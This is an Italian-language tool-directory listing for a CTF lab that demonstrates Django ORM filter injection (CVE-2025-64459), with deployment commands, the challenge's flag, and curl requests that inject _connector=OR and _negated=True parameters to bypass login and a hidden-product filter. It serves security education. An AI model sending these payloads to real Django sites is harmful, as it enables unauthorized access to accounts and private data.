Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-64459 — Sfida CTF distribuibile che dimostra l'iniezione di filtri ORM di Django (CVE-2025-64459) con bypass di autenticazione e bypass di filtri prodotto per l'educazione alla sicurezza web. | Kitploit
Strumenti/GitHubGitHub/z3yr0xx/cve-2025-64459
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebCTFApprendimento e FormazioneLab e Pratica
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

Sfida CTF distribuibile che dimostra l'iniezione di filtri ORM di Django (CVE-2025-64459) con bypass di autenticazione e bypass di filtri prodotto per l'educazione alla sicurezza web.

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sfida CTF: Iniezione Django ORM (CVE-2025-64459)

Categoria: Sicurezza Web
Difficoltà: Media
Vulnerabilità: CVE-2025-64459 - Iniezione di Filtri ORM Django

📝 Descrizione

Abbiamo creato un negozio di merchandising sicuro con pannello di amministrazione. Riesci a bypassare l'autenticazione e trovare la nota privata dell'amministratore?

URL: http://YOUR_SERVER:6008

🚀 Distribuzione

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 Exploit (CVE-2025-64459)

Bypass Autenticazione (/login/)

root@kitploit:~
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Bypass Filtro Prodotti (/)

root@kitploit:~
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 Flag

lol-you-here_then-you_exploited_me

Scarica lo strumento